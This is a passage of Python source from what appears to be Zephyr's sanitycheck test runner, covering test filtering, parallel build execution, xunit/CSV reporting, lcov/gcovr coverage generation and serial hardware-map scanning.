percentage = 0
if value > delta:
percentage = (float(delta) / float(value - delta))
if not all_deltas and (percentage < (footprint_threshold / 100.0)):
continue
logger.info("{:<25} {:<60} {}{}{}: {} {:<+4}, is now {:6} {:+.2%}".format(
i.platform.name, i.testcase.name, Fore.YELLOW,
"INFO" if all_deltas else "WARNING", Fore.RESET,
metric, delta, value, percentage))
warnings += 1
if warnings:
logger.warning("Deltas based on metrics from last %s" %
("release" if not last_metrics else "run"))
def summary(self, unrecognized_sections):
failed = 0
run = 0
for instance in self.instances.values():
if instance.status == "failed":
failed += 1
elif instance.metrics.get("unrecognized") and not unrecognized_sections:
logger.error("%sFAILED%s: %s has unrecognized binary sections: %s" %
(Fore.RED, Fore.RESET, instance.name,
str(instance.metrics.get("unrecognized", []))))
failed += 1
if instance.metrics.get('handler_time', None):
run += 1
if self.total_tests and self.total_tests != self.total_skipped:
pass_rate = (float(self.total_passed) / float(
self.total_tests - self.total_skipped))
else:
pass_rate = 0
logger.info(
"{}{} of {}{} tests passed ({:.2%}), {}{}{} failed, {} skipped with {}{}{} warnings in {:.2f} seconds".format(
Fore.RED if failed else Fore.GREEN,
self.total_passed,
self.total_tests - self.total_skipped,
Fore.RESET,
pass_rate,
Fore.RED if self.total_failed else Fore.RESET,
self.total_failed,
Fore.RESET,
self.total_skipped,
Fore.YELLOW if self.warnings else Fore.RESET,
self.warnings,
Fore.RESET,
self.duration))
self.total_platforms = len(self.platforms)
if self.platforms:
logger.info("In total {} test cases were executed on {} out of total {} platforms ({:02.2f}%)".format(
self.total_cases - self.total_skipped_cases,
len(self.selected_platforms),
self.total_platforms,
(100 * len(self.selected_platforms) / len(self.platforms))
))
logger.info(f"{Fore.GREEN}{run}{Fore.RESET} tests executed on platforms, \
{Fore.RED}{self.total_tests - run - self.total_skipped}{Fore.RESET} tests were only built.")
def save_reports(self, name, suffix, report_dir, no_update, release, only_failed):
if not self.instances:
return
if name:
report_name = name
else:
report_name = "sanitycheck"
if report_dir:
os.makedirs(report_dir, exist_ok=True)
filename = os.path.join(report_dir, report_name)
outdir = report_dir
else:
filename = os.path.join(self.outdir, report_name)
outdir = self.outdir
if suffix:
filename = "{}_{}".format(filename, suffix)
if not no_update:
self.xunit_report(filename + ".xml", full_report=False,
append=only_failed, version=self.version)
self.xunit_report(filename + "_report.xml", full_report=True,
append=only_failed, version=self.version)
self.csv_report(filename + ".csv")
self.target_report(outdir, suffix, append=only_failed)
if self.discards:
self.discard_report(filename + "_discard.csv")
if release:
self.csv_report(self.RELEASE_DATA)
def add_configurations(self):
for board_root in self.board_roots:
board_root = os.path.abspath(board_root)
logger.debug("Reading platform configuration files under %s..." %
board_root)
for file in glob.glob(os.path.join(board_root, "*", "*", "*.yaml")):
logger.debug("Found platform configuration " + file)
try:
platform = Platform()
platform.load(file)
if platform.name in [p.name for p in self.platforms]:
logger.error(f"Duplicate platform {platform.name} in {file}")
raise Exception(f"Duplicate platform identifier {platform.name} found")
if platform.sanitycheck:
self.platforms.append(platform)
if platform.default:
self.default_platforms.append(platform.name)
except RuntimeError as e:
logger.error("E: %s: can't load: %s" % (file, e))
self.load_errors += 1
def get_all_tests(self):
tests = []
for _, tc in self.testcases.items():
for case in tc.cases:
tests.append(case)
return tests
@staticmethod
def get_toolchain():
toolchain = os.environ.get("ZEPHYR_TOOLCHAIN_VARIANT", None) or \
os.environ.get("ZEPHYR_GCC_VARIANT", None)
if toolchain == "gccarmemb":
# Remove this translation when gccarmemb is no longer supported.
toolchain = "gnuarmemb"
try:
if not toolchain:
raise SanityRuntimeError("E: Variable ZEPHYR_TOOLCHAIN_VARIANT is not defined")
except Exception as e:
print(str(e))
sys.exit(2)
return toolchain
def add_testcases(self, testcase_filter=[]):
for root in self.roots:
root = os.path.abspath(root)
logger.debug("Reading test case configuration files under %s..." % root)
for dirpath, dirnames, filenames in os.walk(root, topdown=True):
logger.debug("scanning %s" % dirpath)
if self.SAMPLE_FILENAME in filenames:
filename = self.SAMPLE_FILENAME
elif self.TESTCASE_FILENAME in filenames:
filename = self.TESTCASE_FILENAME
else:
continue
logger.debug("Found possible test case in " + dirpath)
dirnames[:] = []
tc_path = os.path.join(dirpath, filename)
try:
parsed_data = SanityConfigParser(tc_path, self.tc_schema)
parsed_data.load()
tc_path = os.path.dirname(tc_path)
workdir = os.path.relpath(tc_path, root)
for name in parsed_data.tests.keys():
tc = TestCase(root, workdir, name)
tc_dict = parsed_data.get_test(name, self.testcase_valid_keys)
tc.source_dir = tc_path
tc.yamlfile = tc_path
tc.type = tc_dict["type"]
tc.tags = tc_dict["tags"]
tc.extra_args = tc_dict["extra_args"]
tc.extra_configs = tc_dict["extra_configs"]
tc.arch_allow = tc_dict["arch_allow"]
tc.arch_exclude = tc_dict["arch_exclude"]
tc.skip = tc_dict["skip"]
tc.platform_exclude = tc_dict["platform_exclude"]
tc.platform_allow = tc_dict["platform_allow"]
tc.toolchain_exclude = tc_dict["toolchain_exclude"]
tc.toolchain_allow = tc_dict["toolchain_allow"]
tc.tc_filter = tc_dict["filter"]
tc.timeout = tc_dict["timeout"]
tc.harness = tc_dict["harness"]
tc.harness_config = tc_dict["harness_config"]
if tc.harness == 'console' and not tc.harness_config:
raise Exception('Harness config error: console harness defined without a configuration.')
tc.build_only = tc_dict["build_only"]
tc.build_on_all = tc_dict["build_on_all"]
tc.slow = tc_dict["slow"]
tc.min_ram = tc_dict["min_ram"]
tc.depends_on = tc_dict["depends_on"]
tc.min_flash = tc_dict["min_flash"]
tc.extra_sections = tc_dict["extra_sections"]
tc.integration_platforms = tc_dict["integration_platforms"]
tc.parse_subcases(tc_path)
if testcase_filter:
if tc.name and tc.name in testcase_filter:
self.testcases[tc.name] = tc
else:
self.testcases[tc.name] = tc
except Exception as e:
logger.error("%s: can't load (skipping): %s" % (tc_path, e))
self.load_errors += 1
def get_platform(self, name):
selected_platform = None
for platform in self.platforms:
if platform.name == name:
selected_platform = platform
break
return selected_platform
def load_from_file(self, file, filter_status=[]):
try:
with open(file, "r") as fp:
cr = csv.DictReader(fp)
instance_list = []
for row in cr:
if row["status"] in filter_status:
continue
test = row["test"]
platform = self.get_platform(row["platform"])
instance = TestInstance(self.testcases[test], platform, self.outdir)
if self.device_testing:
tfilter = 'runnable'
else:
tfilter = 'buildable'
instance.run = instance.check_runnable(
self.enable_slow,
tfilter,
self.fixtures
)
instance.create_overlay(platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
instance_list.append(instance)
self.add_instances(instance_list)
except KeyError as e:
logger.error("Key error while parsing tests file.({})".format(str(e)))
sys.exit(2)
except FileNotFoundError as e:
logger.error("Couldn't find input file with list of tests. ({})".format(e))
sys.exit(2)
def apply_filters(self, **kwargs):
toolchain = self.get_toolchain()
discards = {}
platform_filter = kwargs.get('platform')
exclude_platform = kwargs.get('exclude_platform', [])
testcase_filter = kwargs.get('run_individual_tests', [])
arch_filter = kwargs.get('arch')
tag_filter = kwargs.get('tag')
exclude_tag = kwargs.get('exclude_tag')
all_filter = kwargs.get('all')
runnable = kwargs.get('runnable')
force_toolchain = kwargs.get('force_toolchain')
force_platform = kwargs.get('force_platform')
emu_filter = kwargs.get('emulation_only')
logger.debug("platform filter: " + str(platform_filter))
logger.debug(" arch_filter: " + str(arch_filter))
logger.debug(" tag_filter: " + str(tag_filter))
logger.debug(" exclude_tag: " + str(exclude_tag))
default_platforms = False
emulation_platforms = False
if platform_filter:
platforms = list(filter(lambda p: p.name in platform_filter, self.platforms))
elif emu_filter:
platforms = list(filter(lambda p: p.simulation != 'na', self.platforms))
else:
platforms = self.platforms
if all_filter:
logger.info("Selecting all possible platforms per test case")
# When --all used, any --platform arguments ignored
platform_filter = []
elif not platform_filter and not emu_filter:
logger.info("Selecting default platforms per test case")
default_platforms = True
elif emu_filter:
logger.info("Selecting emulation platforms per test case")
emulation_platforms = True
logger.info("Building initial testcase list...")
for tc_name, tc in self.testcases.items():
# list of instances per testcase, aka configurations.
instance_list = []
for plat in platforms:
instance = TestInstance(tc, plat, self.outdir)
if runnable:
tfilter = 'runnable'
else:
tfilter = 'buildable'
instance.run = instance.check_runnable(
self.enable_slow,
tfilter,
self.fixtures
)
for t in tc.cases:
instance.results[t] = None
if runnable and self.connected_hardware:
for h in self.connected_hardware:
if h['platform'] == plat.name:
if tc.harness_config.get('fixture') in h.get('fixtures', []):
instance.run = True
if not force_platform and plat.name in exclude_platform:
discards[instance] = discards.get(instance, "Platform is excluded on command line.")
if (plat.arch == "unit") != (tc.type == "unit"):
# Discard silently
continue
if runnable and not instance.run:
discards[instance] = discards.get(instance, "Not runnable on device")
if self.integration and tc.integration_platforms and plat.name not in tc.integration_platforms:
discards[instance] = discards.get(instance, "Not part of integration platforms")
if tc.skip:
discards[instance] = discards.get(instance, "Skip filter")
if tc.build_on_all and not platform_filter:
platform_filter = []
if tag_filter and not tc.tags.intersection(tag_filter):
discards[instance] = discards.get(instance, "Command line testcase tag filter")
if exclude_tag and tc.tags.intersection(exclude_tag):
discards[instance] = discards.get(instance, "Command line testcase exclude filter")
if testcase_filter and tc_name not in testcase_filter:
discards[instance] = discards.get(instance, "Testcase name filter")
if arch_filter and plat.arch not in arch_filter:
discards[instance] = discards.get(instance, "Command line testcase arch filter")
if not force_platform:
if tc.arch_allow and plat.arch not in tc.arch_allow:
discards[instance] = discards.get(instance, "Not in test case arch allow list")
if tc.arch_exclude and plat.arch in tc.arch_exclude:
discards[instance] = discards.get(instance, "In test case arch exclude")
if tc.platform_exclude and plat.name in tc.platform_exclude:
discards[instance] = discards.get(instance, "In test case platform exclude")
if tc.toolchain_exclude and toolchain in tc.toolchain_exclude:
discards[instance] = discards.get(instance, "In test case toolchain exclude")
if platform_filter and plat.name not in platform_filter:
discards[instance] = discards.get(instance, "Command line platform filter")
if tc.platform_allow and plat.name not in tc.platform_allow:
discards[instance] = discards.get(instance, "Not in testcase platform allow list")
if tc.toolchain_allow and toolchain not in tc.toolchain_allow:
discards[instance] = discards.get(instance, "Not in testcase toolchain allow list")
if not plat.env_satisfied:
discards[instance] = discards.get(instance, "Environment ({}) not satisfied".format(", ".join(plat.env)))
if not force_toolchain \
and toolchain and (toolchain not in plat.supported_toolchains) \
and tc.type != 'unit':
discards[instance] = discards.get(instance, "Not supported by the toolchain")
if plat.ram < tc.min_ram:
discards[instance] = discards.get(instance, "Not enough RAM")
if tc.depends_on:
dep_intersection = tc.depends_on.intersection(set(plat.supported))
if dep_intersection != set(tc.depends_on):
discards[instance] = discards.get(instance, "No hardware support")
if plat.flash < tc.min_flash:
discards[instance] = discards.get(instance, "Not enough FLASH")
if set(plat.ignore_tags) & tc.tags:
discards[instance] = discards.get(instance, "Excluded tags per platform (exclude_tags)")
if plat.only_tags and not set(plat.only_tags) & tc.tags:
discards[instance] = discards.get(instance, "Excluded tags per platform (only_tags)")
# if nothing stopped us until now, it means this configuration
# needs to be added.
instance_list.append(instance)
# no configurations, so jump to next testcase
if not instance_list:
continue
# if sanitycheck was launched with no platform options at all, we
# take all default platforms
if default_platforms and not tc.build_on_all:
if tc.platform_allow:
a = set(self.default_platforms)
b = set(tc.platform_allow)
c = a.intersection(b)
if c:
aa = list(filter(lambda tc: tc.platform.name in c, instance_list))
self.add_instances(aa)
else:
self.add_instances(instance_list[:1])
else:
instances = list(filter(lambda tc: tc.platform.default, instance_list))
self.add_instances(instances)
for instance in list(filter(lambda inst: not inst.platform.default, instance_list)):
discards[instance] = discards.get(instance, "Not a default test platform")
elif emulation_platforms:
self.add_instances(instance_list)
for instance in list(filter(lambda inst: not inst.platform.simulation != 'na', instance_list)):
discards[instance] = discards.get(instance, "Not an emulated platform")
else:
self.add_instances(instance_list)
for _, case in self.instances.items():
case.create_overlay(case.platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
self.discards = discards
self.selected_platforms = set(p.platform.name for p in self.instances.values())
for instance in self.discards:
instance.reason = self.discards[instance]
instance.status = "skipped"
instance.fill_results_by_status()
return discards
def add_instances(self, instance_list):
for instance in instance_list:
self.instances[instance.name] = instance
def add_tasks_to_queue(self, build_only=False, test_only=False):
for instance in self.instances.values():
if build_only:
instance.run = False
if test_only:
if instance.run:
pipeline.put({"op": "run", "test": instance, "status": "built"})
else:
if instance.status not in ['passed', 'skipped', 'error']:
instance.status = None
pipeline.put({"op": "cmake", "test": instance})
return "DONE FEEDING"
def execute(self):
def calc_one_elf_size(instance):
if instance.status not in ["error", "failed", "skipped"]:
if instance.platform.type != "native":
size_calc = instance.calculate_sizes()
instance.metrics["ram_size"] = size_calc.get_ram_size()
instance.metrics["rom_size"] = size_calc.get_rom_size()
instance.metrics["unrecognized"] = size_calc.unrecognized_sections()
else:
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["unrecognized"] = []
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
logger.info("Adding tasks to the queue...")
# We can use a with statement to ensure threads are cleaned up promptly
with BoundedExecutor(bound=self.jobs, max_workers=self.jobs) as executor:
# start a future for a thread which sends work in through the queue
future_to_test = {
executor.submit(self.add_tasks_to_queue, self.build_only, self.test_only): 'FEEDER DONE'}
while future_to_test:
# check for status of the futures which are currently working
done, pending = concurrent.futures.wait(future_to_test, timeout=1,
return_when=concurrent.futures.FIRST_COMPLETED)
# if there is incoming work, start a new future
while not pipeline.empty():
# fetch a url from the queue
message = pipeline.get()
test = message['test']
pb = ProjectBuilder(self,
test,
lsan=self.enable_lsan,
asan=self.enable_asan,
ubsan=self.enable_ubsan,
coverage=self.enable_coverage,
extra_args=self.extra_args,
device_testing=self.device_testing,
cmake_only=self.cmake_only,
cleanup=self.cleanup,
valgrind=self.enable_valgrind,
inline_logs=self.inline_logs,
generator=self.generator,
generator_cmd=self.generator_cmd,
verbose=self.verbose,
warnings_as_errors=self.warnings_as_errors
)
future_to_test[executor.submit(pb.process, message)] = test.name
# process any completed futures
for future in done:
test = future_to_test[future]
try:
data = future.result()
except Exception as exc:
logger.error('%r generated an exception:' % (test,))
for line in traceback.format_exc().splitlines():
logger.error(line)
sys.exit('%r generated an exception: %s' % (test, exc))
else:
if data:
logger.debug(data)
# remove the now completed future
del future_to_test[future]
for future in pending:
test = future_to_test[future]
try:
future.result(timeout=180)
except concurrent.futures.TimeoutError:
logger.warning("{} stuck?".format(test))
if self.enable_size_report and not self.cmake_only:
# Parallelize size calculation
executor = concurrent.futures.ThreadPoolExecutor(self.jobs)
futures = [executor.submit(calc_one_elf_size, instance)
for instance in self.instances.values()]
concurrent.futures.wait(futures)
else:
for instance in self.instances.values():
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
instance.metrics["unrecognized"] = []
def discard_report(self, filename):
try:
if not self.discards:
raise SanityRuntimeError("apply_filters() hasn't been run!")
except Exception as e:
logger.error(str(e))
sys.exit(2)
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "reason"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance, reason in sorted(self.discards.items()):
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"reason": reason}
cw.writerow(rowdict)
def target_report(self, outdir, suffix, append=False):
platforms = {inst.platform.name for _, inst in self.instances.items()}
for platform in platforms:
if suffix:
filename = os.path.join(outdir,"{}_{}.xml".format(platform, suffix))
else:
filename = os.path.join(outdir,"{}.xml".format(platform))
self.xunit_report(filename, platform, full_report=True,
append=append, version=self.version)
@staticmethod
def process_log(log_file):
filtered_string = ""
if os.path.exists(log_file):
with open(log_file, "rb") as f:
log = f.read().decode("utf-8")
filtered_string = ''.join(filter(lambda x: x in string.printable, log))
return filtered_string
def xunit_report(self, filename, platform=None, full_report=False, append=False, version="NA"):
total = 0
if platform:
selected = [platform]
else:
selected = self.selected_platforms
if os.path.exists(filename) and append:
tree = ET.parse(filename)
eleTestsuites = tree.getroot()
else:
eleTestsuites = ET.Element('testsuites')
for p in selected:
inst = self.get_platform_instances(p)
fails = 0
passes = 0
errors = 0
skips = 0
duration = 0
for _, instance in inst.items():
handler_time = instance.metrics.get('handler_time', 0)
duration += handler_time
if full_report and instance.run:
for k in instance.results.keys():
if instance.results[k] == 'PASS':
passes += 1
elif instance.results[k] == 'BLOCK':
errors += 1
elif instance.results[k] == 'SKIP' or instance.status in ['skipped']:
skips += 1
else:
fails += 1
else:
if instance.status in ["error", "failed", "timeout"]:
if instance.reason in ['build_error', 'handler_crash']:
errors += 1
else:
fails += 1
elif instance.status == 'skipped':
skips += 1
elif instance.status == 'passed':
passes += 1
else:
logger.error(f"Unknown status {instance.status}")
total = (errors + passes + fails + skips)
# do not produce a report if no tests were actually run (only built)
if total == 0:
continue
run = p
eleTestsuite = None
# When we re-run the tests, we re-use the results and update only with
# the newly run tests.
if os.path.exists(filename) and append:
ts = eleTestsuites.findall(f'testsuite/[@name="{p}"]')
if ts:
eleTestsuite = ts[0]
eleTestsuite.attrib['failures'] = "%d" % fails
eleTestsuite.attrib['errors'] = "%d" % errors
eleTestsuite.attrib['skipped'] = "%d" % skips
else:
logger.info(f"Did not find any existing results for {p}")
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=run, time="%f" % duration,
tests="%d" % (total),
failures="%d" % fails,
errors="%d" % (errors), skipped="%s" % (skips))
eleTSPropetries = ET.SubElement(eleTestsuite, 'properties')
# Multiple 'property' can be added to 'properties'
# differing by name and value
ET.SubElement(eleTSPropetries, 'property', name="version", value=version)
else:
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=run, time="%f" % duration,
tests="%d" % (total),
failures="%d" % fails,
errors="%d" % (errors), skipped="%s" % (skips))
eleTSPropetries = ET.SubElement(eleTestsuite, 'properties')
# Multiple 'property' can be added to 'properties'
# differing by name and value
ET.SubElement(eleTSPropetries, 'property', name="version", value=version)
for _, instance in inst.items():
if full_report:
tname = os.path.basename(instance.testcase.name)
else:
tname = instance.testcase.id
handler_time = instance.metrics.get('handler_time', 0)
if full_report:
for k in instance.results.keys():
# remove testcases that are being re-run from exiting reports
for tc in eleTestsuite.findall(f'testcase/[@name="{k}"]'):
eleTestsuite.remove(tc)
classname = ".".join(tname.split(".")[:2])
eleTestcase = ET.SubElement(
eleTestsuite, 'testcase',
classname=classname,
name="%s" % (k), time="%f" % handler_time)
if instance.results[k] in ['FAIL', 'BLOCK'] or \
(not instance.run and instance.status in ["error", "failed", "timeout"]):
if instance.results[k] == 'FAIL':
el = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message="failed")
else:
el = ET.SubElement(
eleTestcase,
'error',
type="failure",
message="failed")
p = os.path.join(self.outdir, instance.platform.name, instance.testcase.name)
log_file = os.path.join(p, "handler.log")
el.text = self.process_log(log_file)
elif instance.results[k] == 'PASS' \
or (not instance.run and instance.status in ["passed"]):
pass
elif instance.results[k] == 'SKIP' or (instance.status in ["skipped"]):
el = ET.SubElement(eleTestcase, 'skipped', type="skipped", message=instance.reason)
else:
el = ET.SubElement(
eleTestcase,
'error',
type="error",
message=f"{instance.reason}")
else:
if platform:
classname = ".".join(instance.testcase.name.split(".")[:2])
else:
classname = p + ":" + ".".join(instance.testcase.name.split(".")[:2])
# remove testcases that are being re-run from exiting reports
for tc in eleTestsuite.findall(f'testcase/[@classname="{classname}"]'):
eleTestsuite.remove(tc)
eleTestcase = ET.SubElement(eleTestsuite, 'testcase',
classname=classname,
name="%s" % (instance.testcase.name),
time="%f" % handler_time)
if instance.status in ["error", "failed", "timeout"]:
failure = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message=instance.reason)
p = ("%s/%s/%s" % (self.outdir, instance.platform.name, instance.testcase.name))
bl = os.path.join(p, "build.log")
hl = os.path.join(p, "handler.log")
log_file = bl
if instance.reason != 'Build error':
if os.path.exists(hl):
log_file = hl
else:
log_file = bl
failure.text = self.process_log(log_file)
elif instance.status == "skipped":
ET.SubElement(eleTestcase, 'skipped', type="skipped", message="Skipped")
result = ET.tostring(eleTestsuites)
with open(filename, 'wb') as report:
report.write(result)
return fails, passes, errors, skips
def csv_report(self, filename):
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "status",
"extra_args", "handler", "handler_time", "ram_size",
"rom_size"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance in self.instances.values():
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"extra_args": " ".join(instance.testcase.extra_args),
"handler": instance.platform.simulation}
rowdict["status"] = instance.status
if instance.status not in ["error", "failed", "timeout"]:
if instance.handler:
rowdict["handler_time"] = instance.metrics.get("handler_time", 0)
ram_size = instance.metrics.get("ram_size", 0)
rom_size = instance.metrics.get("rom_size", 0)
rowdict["ram_size"] = ram_size
rowdict["rom_size"] = rom_size
cw.writerow(rowdict)
def get_testcase(self, identifier):
results = []
for _, tc in self.testcases.items():
for case in tc.cases:
if case == identifier:
results.append(tc)
return results
class CoverageTool:
""" Base class for every supported coverage tool
"""
def __init__(self):
self.gcov_tool = None
self.base_dir = None
@staticmethod
def factory(tool):
if tool == 'lcov':
t = Lcov()
elif tool == 'gcovr':
t = Gcovr()
else:
logger.error("Unsupported coverage tool specified: {}".format(tool))
return None
return t
@staticmethod
def retrieve_gcov_data(intput_file):
logger.debug("Working on %s" % intput_file)
extracted_coverage_info = {}
capture_data = False
capture_complete = False
with open(intput_file, 'r') as fp:
for line in fp.readlines():
if re.search("GCOV_COVERAGE_DUMP_START", line):
capture_data = True
continue
if re.search("GCOV_COVERAGE_DUMP_END", line):
capture_complete = True
break
# Loop until the coverage data is found.
if not capture_data:
continue
if line.startswith("*"):
sp = line.split("<")
if len(sp) > 1:
# Remove the leading delimiter "*"
file_name = sp[0][1:]
# Remove the trailing new line char
hex_dump = sp[1][:-1]
else:
continue
else:
continue
extracted_coverage_info.update({file_name: hex_dump})
if not capture_data:
capture_complete = True
return {'complete': capture_complete, 'data': extracted_coverage_info}
@staticmethod
def create_gcda_files(extracted_coverage_info):
logger.debug("Generating gcda files")
for filename, hexdump_val in extracted_coverage_info.items():
# if kobject_hash is given for coverage gcovr fails
# hence skipping it problem only in gcovr v4.1
if "kobject_hash" in filename:
filename = (filename[:-4]) + "gcno"
try:
os.remove(filename)
except Exception:
pass
continue
with open(filename, 'wb') as fp:
fp.write(bytes.fromhex(hexdump_val))
def generate(self, outdir):
for filename in glob.glob("%s/**/handler.log" % outdir, recursive=True):
gcov_data = self.__class__.retrieve_gcov_data(filename)
capture_complete = gcov_data['complete']
extracted_coverage_info = gcov_data['data']
if capture_complete:
self.__class__.create_gcda_files(extracted_coverage_info)
logger.debug("Gcov data captured: {}".format(filename))
else:
logger.error("Gcov data capture incomplete: {}".format(filename))
with open(os.path.join(outdir, "coverage.log"), "a") as coveragelog:
ret = self._generate(outdir, coveragelog)
if ret == 0:
logger.info("HTML report generated: {}".format(
os.path.join(outdir, "coverage", "index.html")))
class Lcov(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('*' + pattern + '*')
def add_ignore_directory(self, pattern):
self.ignores.append('*/' + pattern + '/*')
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.info")
ztestfile = os.path.join(outdir, "ztest.info")
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool,
"--capture", "--directory", outdir,
"--rc", "lcov_branch_coverage=1",
"--output-file", coveragefile], stdout=coveragelog)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--extract",
coveragefile,
os.path.join(self.base_dir, "tests", "ztest", "*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--remove",
ztestfile,
os.path.join(self.base_dir, "tests/ztest/test/*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
for i in self.ignores:
subprocess.call(
["lcov", "--gcov-tool", self.gcov_tool, "--remove",
coveragefile, i, "--output-file",
coveragefile, "--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
# The --ignore-errors source option is added to avoid it exiting due to
# samples/application_development/external_lib/
return subprocess.call(["genhtml", "--legend", "--branch-coverage",
"--ignore-errors", "source",
"-output-directory",
os.path.join(outdir, "coverage")] + files,
stdout=coveragelog)
class Gcovr(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('.*' + pattern + '.*')
def add_ignore_directory(self, pattern):
self.ignores.append(".*/" + pattern + '/.*')
@staticmethod
def _interleave_list(prefix, list):
tuple_list = [(prefix, item) for item in list]
return [item for sublist in tuple_list for item in sublist]
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.json")
ztestfile = os.path.join(outdir, "ztest.json")
excludes = Gcovr._interleave_list("-e", self.ignores)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-e", "tests/*"] + excludes +
["--json", "-o", coveragefile, outdir],
stdout=coveragelog)
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-f", "tests/ztest", "-e",
"tests/ztest/test/*", "--json", "-o", ztestfile,
outdir], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
subdir = os.path.join(outdir, "coverage")
os.makedirs(subdir, exist_ok=True)
tracefiles = self._interleave_list("--add-tracefile", files)
return subprocess.call(["gcovr", "-r", self.base_dir, "--html",
"--html-details"] + tracefiles +
["-o", os.path.join(subdir, "index.html")],
stdout=coveragelog)
class HardwareMap:
schema_path = os.path.join(ZEPHYR_BASE, "scripts", "sanity_chk", "hwmap-schema.yaml")
manufacturer = [
'ARM',
'SEGGER',
'MBED',
'STMicroelectronics',
'Atmel Corp.',
'Texas Instruments',
'Silicon Labs',
'NXP Semiconductors',
'Microchip Technology Inc.',
'FTDI',
'Digilent'
]
runner_mapping = {
'pyocd': [
'DAPLink CMSIS-DAP',
'MBED CMSIS-DAP'
],
'jlink': [
'J-Link',
'J-Link OB'
],
'openocd': [
'STM32 STLink', '^XDS110.*', 'STLINK-V3'
],
'dediprog': [
'TTL232R-3V3',
'MCP2200 USB Serial Port Emulator'
]
}
def __init__(self):
self.detected = []
self.connected_hardware = []
def load_device_from_cmdline(self, serial, platform, pre_script, is_pty):
device = {
"serial": None,
"platform": platform,
"serial_pty": None,
"counter": 0,
"available": True,
"connected": True,
"pre_script": pre_script
}
if is_pty:
device['serial_pty'] = serial
else:
device['serial'] = serial
self.connected_hardware.append(device)
def load_hardware_map(self, map_file):
hwm_schema = scl.yaml_load(self.schema_path)
self.connected_hardware = scl.yaml_load_verify(map_file, hwm_schema)
for i in self.connected_hardware:
i['counter'] = 0
def scan_hw(self, persistent=False):
from serial.tools import list_ports
if persistent and platform.system() == 'Linux':
# On Linux, /dev/serial/by-id provides symlinks to
# '/dev/ttyACMx' nodes using names which are unique as
# long as manufacturers fill out USB metadata nicely.
#
# This creates a map from '/dev/ttyACMx' device nodes
# to '/dev/serial/by-id/usb-...' symlinks. The symlinks
# go into the hardware map because they stay the same
# even when the user unplugs / replugs the device.
#
# Some inexpensive USB/serial adapters don't result
# in unique names here, though, so use of this feature
# requires explicitly setting persistent=True.
by_id = Path('/dev/serial/by-id')
def readlink(link):
return str((by_id / link).resolve())
persistent_map = {readlink(link): str(link)
for link in by_id.iterdir()}
else:
persistent_map = {}
serial_devices = list_ports.comports()
logger.info("Scanning connected hardware...")
for d in serial_devices:
if d.manufacturer in self.manufacturer:
# TI XDS110 can have multiple serial devices for a single board
# assume endpoint 0 is the serial, skip all others
if d.manufacturer == 'Texas Instruments' and not d.location.endswith('0'):
continue
s_dev = {}
s_dev['platform'] = "unknown"
s_dev['id'] = d.serial_number
s_dev['serial'] = persistent_map.get(d.device, d.device)
s_dev['product'] = d.product
s_dev['runner'] = 'unknown'
for runner, _ in self.runner_mapping.items():
products = self.runner_mapping.get(runner)
if d.product in products:
s_dev['runner'] = runner
continue
# Try regex matching
for p in products:
if re.match(p, d.product):
s_dev['runner'] = runner
s_dev['available'] = True
s_dev['connected'] = True
self.detected.append(s_dev)
else:
logger.warning("Unsupported device (%s): %s" % (d.manufacturer, d))
def write_map(self, hwm_file):
# use existing map
if os.path.exists(hwm_file):
with open(hwm_file, 'r') as yaml_file:
hwm = yaml.load(yaml_file, Loader=SafeLoader)
hwm.sort(key=lambda x: x['serial'] or '')
# disconnect everything
for h in hwm:
h['connected'] = False
h['serial'] = None
self.detected.sort(key=lambda x: x['serial'] or '')
for d in self.detected:
for h in hwm:
if d['id'] == h['id'] and d['product'] == h['product'] and not h['connected'] and not d.get('match', False):
h['connected'] = True
h['serial'] = d['serial']
d['match'] = True
new = list(filter(lambda n: not n.get('match', False), self.detected))
hwm = hwm + new
logger.info("Registered devices:")
self.dump(hwm)
with open(hwm_file, 'w') as yaml_file:
yaml.dump(hwm, yaml_file, Dumper=Dumper, default_flow_style=False)
else:
# create new file
with open(hwm_file, 'w') as yaml_file:
yaml.dump(self.detected, yaml_file, Dumper=Dumper, default_flow_style=False)
logger.info("Detected devices:")
self.dump(self.detected)
@staticmethod
def dump(hwmap=[], filtered=[], header=[], connected_only=False):
print("")
table = []
if not header:
header = ["Platform", "ID", "Serial device"]
